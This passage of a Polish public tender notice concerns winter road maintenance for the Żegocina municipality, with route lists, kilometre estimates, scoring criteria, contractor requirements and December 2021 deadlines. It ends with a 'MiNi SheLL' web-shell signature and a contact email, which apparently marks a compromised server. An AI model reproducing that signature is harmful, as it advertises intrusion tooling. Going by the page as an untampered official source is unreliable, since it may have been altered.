oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym<br/>przez niego zakresie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów biorąc pod uwagę nw. kryteria. Łączna ilość punktów dla każdej oferty stanowić będzie sumę punktów uzyskanych w podanych kryteriach tj.:<br/>C = Kryterium: Cena – waga 60 %<br/>T = Kryterium: Termin płatności faktur – waga 40 %<br/>Termin płatności faktury<br/>Termin płatności faktury- 40 pkt wg zadeklarowanego terminu płatności faktury<br/>7 dni - 0 pkt<br/>14 dni - 10 pkt<br/>21 dni - 20 pkt<br/>30 dni - 40 pkt<br/>Uwagi:<br/>W przypadku braku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu płatności Zamawiający uzna, że Wykonawca zaoferował termin 7 dni. Maksymalny termin płatności do oceny ofert wynosi 30 dni. Jeżeli Wykonawca zaoferuje termin płatności dłuższy niż 30 dni, do oceny ofert zostanie przyjęty okres 30 dni i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy termin płatności otrzymuje maksymalna liczbę punktów w ramach kryterium termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 – Rozdziele: (Usuwanie samej śliskości/usuwanie śliskości przy odśnieżaniu) -Rozdziele – Magazyn-Kamionka – Laskowa, Zagrabie – Góry – Dwór, Doliny, Widoma – Bacówka, Rozdziele Góry (Ryba), Rozdziele Rola, Rozdziele Błaskówka<br/>Przewidywana liczba kilometrów do zimowego utrzymania dróg w okresie 01.01.2022r.-30.04.2022r. wynosi: <br/>- usuwanie samej śliskości: 65,10 km, <br/>- usuwanie śliskości przy odśnieżaniu: 10,80 km, <br/>w okresie 01.10.2022-31.12.2022r. <br/>- usuwanie samej śliskości: 10,80 km, <br/>- usuwanie śliskości przy odśnieżaniu: 10,80 km. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90630000-2 - Usługi usuwania oblodzeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji o którym mowa w art.441<br/>ust.1 Pzp., polegające na świadczeniu usługi przez wykonawcę na takich samych warunkach<br/>określonych w umowie, po wyczerpaniu zakresu ilości kilometrów dróg podanych w Rozdziale 5<br/>SWZ. Opis przedmiotu zamówienia w ust. 3 SWZ, maksymalnie do wysokości 30% zamówienia<br/>podstawowego. Prawo opcji oznacza, że usługi objęte prawem opcji zostaną zakupione w<br/>zależności od potrzeb i posiadanych środków przez Zamawiającego. Prawo opcji jest<br/>uprawnieniem Zamawiającego z którego może ale nie musi skorzystać. W przypadku<br/>nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne<br/>roszczenia z tego tytułu. Warunkiem uruchomiania prawa opcji jest złożenie przez<br/>Zamawiającego oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów biorąc pod uwagę nw. kryteria. Łączna ilość punktów dla każdej oferty stanowić będzie sumę punktów uzyskanych w podanych kryteriach tj.:<br/>C = Kryterium: Cena – waga 60 %<br/>T = Kryterium: Termin płatności faktur – waga 40 %<br/>Termin płatności faktury<br/>Termin płatności faktury- 40 pkt wg zadeklarowanego terminu płatności faktury<br/>7 dni - 0 pkt<br/>14 dni - 10 pkt<br/>21 dni - 20 pkt<br/>30 dni - 40 pkt<br/>Uwagi:<br/>W przypadku braku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu płatności Zamawiający uzna, że Wykonawca zaoferował termin 7 dni. Maksymalny termin płatności do oceny ofert wynosi 30 dni. Jeżeli Wykonawca zaoferuje termin płatności dłuższy niż 30 dni, do oceny ofert zostanie przyjęty okres 30 dni i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy termin płatności otrzymuje maksymalna liczbę punktów w ramach kryterium termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 - Bełdno – Żegocina (Usuwanie samej śliskości/usuwanie śliskości przy odśnieżaniu) - Wieś od drogi powiatowej - centrum wsi, Konice (Granice), Wieś – Zastawie, Bełdno – Siandajówka - Podlas – Podlesie – Potoki, Wieś - Kępa – Juszczyk – Połom, Żegocina - Ośrodek Zdrowia – Górczyna, Nagórze – Góry, Przysłop, Wiktorówka - Górczyna, Podlesie, Nowa Wieś, Ośrodek zdrowia, do cmentarza, Żarnówka (Fąfara), Kępiaki, Szkoła – Przedszkole, Brzeg, Patrówka, Łąkta Górna - Lisówki – Sikornice, Lisówki – Konice, Podkosówka, Brzeziny, Kuce, Janickówka, Przedszkole, Witkówka, Cebula (lotnisko), Łąkta Górna (Żarnówka osiedle) - Bytomsko (Figura), Kamionki, Madejówka, Bytomsko – Nagórze, Podlas- Prytko – Fąfara – Młyn, Podlas - Majdan <br/>Przewidywana liczba kilometrów do zimowego utrzymania dróg w okresie 01.01.2022r.-30.04.2022r. wynosi: <br/>- usuwanie samej śliskości: 170,10 km, <br/>- usuwanie śliskości przy odśnieżaniu: 24,30 km, <br/>w okresie 01.10.2022-31.12.2022r.<br/>- usuwanie samej śliskości: 24,30 km,<br/>- usuwanie śliskości przy odśnieżaniu: 24,30 km,<br/> <br/>Podany powyżej kilometraż dróg jest orientacyjny. Podanie faktycznej ilości kilometrów zimowego odśnieżania dróg w okresie umownym nie jest możliwe do określenia – związane jest to z warunkami meteorologicznymi, niezależnymi od Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90630000-2 - Usługi usuwania oblodzeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji o którym mowa w art.441<br/>ust.1 Pzp., polegające na świadczeniu usługi przez wykonawcę na takich samych warunkach<br/>określonych w umowie, po wyczerpaniu zakresu ilości kilometrów dróg podanych w Rozdziale 5<br/>SWZ. Opis przedmiotu zamówienia w ust. 3 SWZ, maksymalnie do wysokości 30% zamówienia<br/>podstawowego. Prawo opcji oznacza, że usługi objęte prawem opcji zostaną zakupione w<br/>zależności od potrzeb i posiadanych środków przez Zamawiającego. Prawo opcji jest<br/>uprawnieniem Zamawiającego z którego może ale nie musi skorzystać. W przypadku<br/>nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne<br/>roszczenia z tego tytułu. Warunkiem uruchomiania prawa opcji jest złożenie przez<br/>Zamawiającego oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów biorąc pod uwagę nw. kryteria. Łączna ilość punktów dla każdej oferty stanowić będzie sumę punktów uzyskanych w podanych kryteriach tj.:<br/>C = Kryterium: Cena – waga 60 %<br/>T = Kryterium: Termin płatności faktur – waga 40 %<br/>Termin płatności faktury<br/>Termin płatności faktury- 40 pkt wg zadeklarowanego terminu płatności faktury<br/>7 dni - 0 pkt<br/>14 dni - 10 pkt<br/>21 dni - 20 pkt<br/>30 dni - 40 pkt<br/>Uwagi:<br/>W przypadku braku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu płatności Zamawiający uzna, że Wykonawca zaoferował termin 7 dni. Maksymalny termin płatności do oceny ofert wynosi 30 dni. Jeżeli Wykonawca zaoferuje termin płatności dłuższy niż 30 dni, do oceny ofert zostanie przyjęty okres 30 dni i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy termin płatności otrzymuje maksymalna liczbę punktów w ramach kryterium termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponować w okresie wykonywania zamówienia minimum 1 jednostką sprzętową technicznie sprawną do realizacji usługi zimowego utrzymania dróg tj. do odśnieżania/zwalczania śliskości.<br/>Przez jednostkę sprzętową Zamawiający rozumie ciągnik lub inny pojazd samobieżny wyposażony w pług lemieszowy/rozrzutnik do materiału uszorstniającego lub pojazdy oddzielnie wyposażone w pług lemieszowy i oddzielnie w rozrzutnik.<br/>W przypadku, gdy Wykonawca składa ofertę na realizację usługi na więcej niż jedną część (część–zgodnie z rozdz. 5 pkt. 2 SWZ) winien wykazać, że dysponuje lub będzie dysponował w okresie wykonywania zamówienia minimum jedną jednostką sprzętową na każdą cześć zamówienia do odśnieżania/zwalczania śliskości wraz z obsługą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>b) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Informacji o<br/>Działalności Gospodarczej, w zakresie art.109 ust.1pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz narzędzi (zgodny ze wzorem zamieszczonym w załączniku nr 7 do<br/>SWZ), wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania<br/>zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda, złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę stanowi wypełniony Formularz Ofertowy – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z<br/>ofertą<br/>Wykonawca jest zobowiązany złożyć:<br/>a) dokumenty, z których wynika prawo do podpisania oferty, tj. odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru odpowiednie pełnomocnictwa (jeżeli dotyczy) Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał w<br/>Formularzu Oferty dane umożliwiające dostęp do tych dokumentów. Upoważnienie osób<br/>podpisujących ofertę musi bezpośrednio wynikać z ww. dokumentów;<br/>b) oświadczenie, o którym mowa w art. 125 ust. 1 Pzp o niepodleganiu wykluczeniu z<br/>postępowania i spełnienie warunków udziału w postępowaniu w zakresie wskazanym w<br/>Rozdziale 9 i 10 SWZ – zgodnie z załącznikiem 2 do SWZ – oświadczenie stanowi dowód<br/>potwierdzający brak podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu na<br/>dzień składania ofert; oświadczenie składa się, pod rygorem nieważności, w formie<br/>elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>c) wykonawca, który powołuje się na zasoby innych podmiotów w celu wykazania braku istnienia<br/>wobec nich podstaw wykluczenia oraz spełniania – w zakresie, w jakim powołuje się na ich<br/>zasoby – warunków udziału w postępowaniu, przedstawia wraz z oświadczeniem, o którym<br/>mowa w lit.b także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby – wg załącznika nr 3<br/>do SWZ;<br/>d) w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w lit. b, składa każdy z wykonawców; oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>e) Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania<br/>Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.<br/>f) zobowiązanie podmiotu udostępniającego wykonawcy zasoby, do oddania do dyspozycji<br/>wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów (o ile wykonawca korzysta ze zdolności innych<br/>podmiotów na zasadach określonych w art. 118 Pzp) – wg załącznika nr 4 do SWZ;<br/>g) oświadczenie składane na podstawie art. 117 ust. 4 Pzp przez wykonawców ubiegających się<br/>wspólnie o udzielenie zamówienia publicznego, z którego wynika, które roboty budowlane, lub<br/>usługi wykonają poszczególni wykonawcy występujący wspólnie (dot. również spółki cywilnej) – wg załącznika nr 5 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Oświadczenie, o którym mowa w Rozdziale 11 ust.1 składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający, zgodnie z art.59 ustawy Pzp. żąda kopii umowy regulującej współpracę tych Wykonawców przed zawarciem umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanych w projektowanych<br/>postanowieniach umowy, stanowiących Załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-16 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w systemie pod adresem https://zegocina.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com